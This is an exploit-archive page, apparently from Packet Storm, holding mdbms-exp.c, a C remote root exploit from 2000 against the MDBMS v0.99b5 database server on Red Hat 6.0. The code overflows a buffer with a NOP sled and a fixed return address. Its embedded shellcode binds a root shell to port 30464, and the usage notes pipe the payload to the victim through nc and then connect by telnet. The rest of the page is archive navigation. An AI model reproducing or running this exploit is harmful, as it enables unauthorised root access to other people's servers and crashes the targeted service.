mdbms-exp.c

mdbms-exp.c: Posted Jun 2, 2000; Authored by Diab; MDBMS v0.99b5 remote root exploit - tested on Redhat 6.0. Shellcode runs an interactive shell on port 30464.; tags | exploit, remote, shell, root, shellcode; systems | linux, redhat; SHA-256 | a37ea7852b725a2b014dd84e51b418b4f973791e412512e52b44f2d86f61fd6c; Download | Favorite | View

mdbms-exp.c

/*
 * Since this has gone public, heres my version....
 *
 * Remote root MDBMS exploit for linux
 * by diab <danmcl@kmail.com.au>
 *
 *
 * Tested against MDBMS v0.99b5 on a Redhat 6.0 box
 * To obtain MDBMS: http://linux.davecentral.com/892_dataclients.html
 *
 * Usage: Step 1: (./mdbms-exp offset ; cat) | nc victim 2223
 *        Step 2: telnet victim 30464 (should be in a interactive shell)
 *        
 * *NOTE*:  The MDBMS server crashes once the exploit is sent, so you
 *          really only have one chance until the admin restarts the
 *          server, which could be on the next reboot or whatever.
 */

#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>
  
#define BUFLEN 1000
#define NOP    0x90
#define RET    0xbfffd278

/* port binding shellcode stolen from Taeho Oh's tutorial */
/* props to him 8)                                        */
char shellcode[]=
        "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"          
  "\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"          
  "\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
        "\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
        "\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"          
  "\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"          
  "\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
        "\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"          
  "\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
        "\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
        "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
        "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";         

int main (int argc, char *argv[])
{
   char buf[BUFLEN];
   int i, offset;
   long addr;
   
   if(argc>1) offset = atoi(argv[1]);
   else
   offset = 0;

   addr = RET + offset;

   for (i = 0; i < BUFLEN; i += 4)
    *(long *) &buf[i] = addr;

   for (i = 300; i < (BUFLEN - strlen (shellcode) - 100); i++)
    *(buf + i) = NOP;

   /* greets: #hpaus, #ozsecurity, #x25 */
   fprintf(stderr,"\nUsing address 0x%lx\n\n", addr);
   memcpy (buf + i, shellcode, strlen (shellcode));
   sleep(1);
   printf("\\h %s\r\n", buf);

   return;
}

Top Authors In Last 30 Days

Red Hat 240 files
indoushka 87 files
Ubuntu 85 files
Debian 22 files
LiquidWorm 21 files
Gentoo 8 files
Google Security Research 8 files
malvuln 5 files
Seth Jenkins 4 files
Emiliano Febbi 4 files

File Archives

Systems

AIX (430)
Apple (2,117)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,147)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (391)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,669)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,125)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,946)
UNIX (9,470)
UnixWare (188)
Windows (6,784)
Other

mdbms-exp.c

mdbms-exp.c

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

mdbms-exp.c

Share This

mdbms-exp.c

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems